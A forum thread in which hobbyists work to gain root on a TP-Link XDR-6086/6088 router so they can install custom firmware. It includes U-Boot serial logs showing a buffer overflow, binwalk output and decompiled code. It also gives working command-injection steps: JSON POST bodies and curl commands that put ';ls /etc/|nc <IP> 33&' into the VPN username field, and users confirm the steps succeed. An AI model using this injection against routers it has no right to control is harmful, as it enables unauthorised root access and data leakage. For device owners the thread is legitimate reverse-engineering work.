0x100000 is some factory info.
0x4c0000 is some TP-Link header info.

Also, looks like we have a memory allocation issue here. Not sure if we can use this to our advantage.

MT7986> goash                                                                                                                                                     
Reading from 0x100000 to 0x11ffff, size 0x20000 ...                                                                                                               
Succeeded                                                                                                                                                         
Reading from 0x4c0000 to 0x4dffff, size 0x20000 ...                                                                                                               
Succeeded                                                                                                                                                         
TP key selected.                                                                                                                                                  
  Sign   String:     IECJEAAAAAAADIFIAADC                                                                                                                         
                                                                                                                                                                  
  Please Input Sign Result:                                                                                                                                       
                                                                                                                                                                  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
verifyIdentity failed!                                                                                                                                            
MT7986>                                                                                                                                                           
alloc space exhausted                                                                                                                                             
malloc(FACTORY_INFO_LEN) failed!                                                                                                                                  
getDevIDFromFlash error.                                                                                                                                          
alloc space exhausted                                                                                                                                             
malloc tp_header buff error                                                                                                                                       
                                                                                                                                                                  
getDevIDFromFlash error.                                                                                                                                          
  Sign   String:     OHLNGAAAAAAAAAAAAAAA                                                                                                                         
                                                                                                                                                                  
  Please Input Sign Result:      

Running go after this panics and dumps registers

MT7986> go                                                                                                                                                        
"Synchronous Abort" handler, esr 0x96000004                                                                                                                       
elr: 0000000041e460f8 lr : 0000000041e460f0 (reloc)                                                                                                               
elr: 000000005ff700f8 lr : 000000005ff700f0                                                                                                                       
x0 : 0000000000000006 x1 : 000000005ffabd25                                                                                                                       
x2 : 0000000000000000 x3 : 0000000000000020                                                                                                                       
x4 : 0000000000000078 x5 : 000000005ffabd1f                                                                                                                       
x6 : 0000000000000000 x7 : 000000005ffe78f0                                                                                                                       
x8 : 000000007d1edb1e x9 : 0000000000000008                                                                                                                       
x10: 000000007f86c985 x11: 00000000efcdab89                                                                                                                       
x12: 0000000067452301 x13: 00000000ca62c1d6                                                                                                                       
x14: 000000006cec86a8 x15: 0000000005ec9c3a                                                                                                                       
x16: 0000000000000000 x17: 0000000000000000                                                                                                                       
x18: 000000005f7ffdb0 x19: 000000005f7ff402                                                                                                                       
x20: 4141414141414141 x21: 000000005ffabd1f                                                                                                                       
x22: 0000000000000020 x23: 0000000000000006                                                                                                                       
x24: 000000005f7ff2f4 x25: 000000005f7ffea8                                                                                                                       
x26: 4141414141414141 x27: 000000000001ffff                                                                                                                       
x28: 0000000000000000 x29: 000000005f7ff1a0  

I think you can refer to this example, use tplink's original uboot as a guide, and only modify the rear firmware, 发一个自己编译的 wdr5600v2 openwrt 固件,附带修改的 patch 文件-Tp-link无线路由器及网络设备-恩山无线论坛 (right.com.cn)

1 Like

This is always an option but is not very friendly for the average user. There is a buffer overflow in TP-Link's goash u-boot application. I haven't had time to see if we can actually exploit it, but it may be what we need.

TP-Link basically told me to f-off when I asked for source code so they can forget about responsible disclosure for this one.

1 Like

TP-Link XDR-6088 is almost identical to TP-Link XDR-6086, but it has more ethernet ports.

There are two FWs on TP-LINK website for XDR-6088, is that help?

binwalk -B TL-XDR6088_20220610_1.0.15.bin 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
512           0x200           LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 663072 bytes
393728        0x60200         Flattened device tree, size: 4363000 bytes, version: 17
393960        0x602E8         LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 13113352 bytes
4734236       0x483D1C        Flattened device tree, size: 21160 bytes, version: 17
7209472       0x6E0200        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9154758 bytes, 1498 inodes, blocksize: 262144 bytes, created: 2022-04-21 09:42:38
binwalk -B TL-XDR6088_V1.0_1.0.22_Build_220720_Rel.43784.bin 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
512           0x200           LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 663072 bytes
393728        0x60200         Flattened device tree, size: 4469508 bytes, version: 17
393960        0x602E8         LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 13387784 bytes
4840744       0x49DD28        Flattened device tree, size: 21160 bytes, version: 17
7209472       0x6E0200        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 35016149 bytes, 2007 inodes, blocksize: 262144 bytes, created: 2022-07-04 07:05:56

The download link is here:

I have the whole firmware dumped from the device but thank you. Really just need to figure out this overflow to see if it can be used to get a shell/console. I think it's going to take setting up a qemu environment with a debugger to get it.

I just fund a shell injection in DMS, it can get root access to the system, is this usefull?

here is the kernel log

2 Likes

Can you elaborate on what you did?

In the router's web interface
Go the VPN Server List
Add a L2TP Server
Then go to the Server User Manager
Add a new User
Using the user name to inject shell code.
Post data to change the user name like:
post

http://192.168.1.1/stok=<your token>/ds

body

{"vpn":{"user_1":{"username":";ls /etc/|nc 192.168.8.1 33&","password":"aaaa1111","type":"l2tp","netmode":"client2lan","localip":"192.168.10.11","dns":"223.5.5.5","block":"0","ippool":"d1","maxsessions":"10"}},"method":"set"}

Then click disable in the web interface to trigger the shell code.

The code behind this

snprintf(
      v20,
      0x200uLL,
      ". /lib/vpn/user.sh; block_user %s %s %s &",
      (const char *)&v19[11] + 2,
      v16,
      off_99D8A8[v19[65]]);
    strncpy(v13, "vpnUserVerify", 0x1FuLL);
    logOutput(v13, 0x479u, 0xBu, 1u, "VPN: command: %s\n", v20);
    if ( (unsigned int)dbgPrintfMaskCheck(11LL) && (unsigned __int8)dbgPrintfLvlGet() <= 1u )
      printf("\t%s(%d). command: %s\n\n", "vpnUserVerify", 1145LL, v20);
    systemAsyncExec((__int64)v20);
 if ( vfork()
      || (v10[0] = (__int64)"sh",
          v10[1] = (__int64)"-c",
          v10[2] = a1,
          v10[3] = 0LL,
          !(unsigned int)execve((__int64)"/bin/sh", (__int64)v10, (__int64)&v9)) )
    {
      v6 = 0;
    }
    else
5 Likes

I think I'm missing part of this, so the steps are:

  1. Create L2TP Server
  2. Add a new user
  3. Get stok (proxy like burpsuite can get this)
  4. Use an HTTP POST to update the existing user we created?

I've been trying
curl -H "Content-Type: application/json" -X POST -d {"vpn":{"user_1":{"username":";ls /etc/|nc 192.168.1.100 33&","password":"aaaa1111","type":"l2tp","netmode":"client2lan","localip":"192.168.10.11","dns":"223.5.5.5","block":"0","ippool":"d1","maxsessions":"10"}},"method":"set"} http://192.168.1.1/stok=<stok>/ds

which results in {"error_code":-40210}

In browser press F12 you can find your stok.
You can using Firefox, it can edit and resend request.
Make sure all the infos are match your own, like "ippool"
The result should be {"error_code":0}

1 Like

I am able to reproduce!

FWIW I used the following:

curl -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","para":{"username":";ls /etc|nc <my pc IP> 33&","password":"password1","type":"l2tp","netmode":"client2lan","localip":"192.168.2.1","dns":"1.1.1.1","block":"0","ippool":"new","maxsessions":"1"},"name":"user_1"},"method":"add"}' http://192.168.1.1/stok=<stok>/ds

Then disable the user from the GUI.

Fantastic find!!! This may work.

1 Like